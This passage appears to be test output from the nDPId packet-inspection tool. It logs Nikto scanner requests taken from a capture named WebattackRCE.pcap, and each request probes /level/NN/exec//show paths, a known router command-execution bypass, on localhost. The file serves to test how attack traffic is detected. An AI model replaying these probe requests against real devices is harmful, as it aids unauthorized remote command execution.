Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/86\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001333)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":635,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277718,"flow_last_seen":1576420277718,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50832,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":635,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_packet_id":1,"flow_last_seen":1576420277718,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277718,"pkt":"AAAAAAAAAAAAAAAACABFAADI9rtAAEAGRXJ\/AAABfwAAAcaQH5Cd5s+tew18QIAYAED+vAAAAQEICp1m\/v6dZv7+R0VUIC9sZXZlbC84Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzM0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":635,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277718,"flow_last_seen":1576420277718,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50832,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/87\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001334)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":636,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277719,"flow_last_seen":1576420277719,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50834,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":636,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_packet_id":1,"flow_last_seen":1576420277719,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277719,"pkt":"AAAAAAAAAAAAAAAACABFAADIwR1AAEAGexB\/AAABfwAAAcaSH5DFAfgO5Rn4M4AYAED+vAAAAQEICp1m\/v+dZv7\/R0VUIC9sZXZlbC84OC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzUpDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":636,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277719,"flow_last_seen":1576420277719,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50834,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/88\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001335)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":637,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277721,"flow_last_seen":1576420277721,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50836,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":637,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_packet_id":1,"flow_last_seen":1576420277721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277721,"pkt":"AAAAAAAAAAAAAAAACABFAADIEWBAAEAGKs5\/AAABfwAAAcaUH5BnvihJZne+zoAYAED+vAAAAQEICp1m\/wGdZv8BR0VUIC9sZXZlbC84OS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzM2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":637,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277721,"flow_last_seen":1576420277721,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50836,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/89\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001336)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":638,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277723,"flow_last_seen":1576420277723,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277723,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50838,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":638,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_packet_id":1,"flow_last_seen":1576420277723,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277723,"pkt":"AAAAAAAAAAAAAAAACABFAADIo9hAAEAGmFV\/AAABfwAAAcaWH5BWPprB7Bx1PYAYAED+vAAAAQEICp1m\/wKdZv8CR0VUIC9sZXZlbC85MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":638,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277723,"flow_last_seen":1576420277723,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277723,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50838,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/90\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001337)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":639,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277725,"flow_last_seen":1576420277725,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50840,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_packet_id":1,"flow_last_seen":1576420277725,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277725,"pkt":"AAAAAAAAAAAAAAAACABFAADI7YBAAEAGTq1\/AAABfwAAAcaYH5AUj9RqmT7XtIAYAED+vAAAAQEICp1m\/wWdZv8FR0VUIC9sZXZlbC85MS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzM4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":639,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277725,"flow_last_seen":1576420277725,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50840,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/91\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001338)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":640,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277727,"flow_last_seen":1576420277727,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50842,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_packet_id":1,"flow_last_seen":1576420277727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277727,"pkt":"AAAAAAAAAAAAAAAACABFAADIYyZAAEAG2Qd\/AAABfwAAAcaaH5DSD1o0DsX43oAYAED+vAAAAQEICp1m\/wadZv8GR0VUIC9sZXZlbC85Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":640,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277727,"flow_last_seen":1576420277727,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50842,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/92\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001339)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":641,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277729,"flow_last_seen":1576420277729,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277729,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50844,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":641,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_packet_id":1,"flow_last_seen":1576420277729,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277729,"pkt":"AAAAAAAAAAAAAAAACABFAADIxzpAAEAGdPN\/AAABfwAAAcacH5ALNv4hgWKnmoAYAED+vAAAAQEICp1m\/widZv8IR0VUIC9sZXZlbC85My9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":641,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277729,"flow_last_seen":1576420277729,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277729,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50844,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/93\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001340)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":642,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277730,"flow_last_seen":1576420277730,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50846,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":642,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_packet_id":1,"flow_last_seen":1576420277730,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277730,"pkt":"AAAAAAAAAAAAAAAACABFAADIHv9AAEAGHS9\/AAABfwAAAcaeH5AL7Sfmt4JqA4AYAED+vAAAAQEICp1m\/wqdZv8KR0VUIC9sZXZlbC85NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzNDEpDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":642,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277730,"flow_last_seen":1576420277730,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50846,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/94\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001341)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":643,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277732,"flow_last_seen":1576420277732,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277732,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50848,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":643,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_packet_id":1,"flow_last_seen":1576420277732,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277732,"pkt":"AAAAAAAAAAAAAAAACABFAADIPWZAAEAG\/sd\/AAABfwAAAcagH5BD6AR+QNLU5oAYAED+vAAAAQEICp1m\/wydZv8MR0VUIC9sZXZlbC85NS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":643,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277732,"flow_last_seen":1576420277732,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277732,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50848,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/95\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001342)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":644,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277734,"flow_last_seen":1576420277734,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50850,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_packet_id":1,"flow_last_seen":1576420277734,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277734,"pkt":"AAAAAAAAAAAAAAAACABFAADISBNAAEAG9Bp\/AAABfwAAAcaiH5A0bnEJpPWxcYAYAED+vAAAAQEICp1m\/w6dZv8OR0VUIC9sZXZlbC85Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":644,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277734,"flow_last_seen":1576420277734,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50850,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/96\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001343)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277736,"flow_last_seen":1576420277736,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277736,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50852,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":1,"flow_last_seen":1576420277736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277736,"pkt":"AAAAAAAAAAAAAAAACABFAADIC2JAAEAGMMx\/AAABfwAAAcakH5C2tzJ7p90VYYAYAED+vAAAAQEICp1m\/xCdZv8PR0VUIC9sZXZlbC85Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQ0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 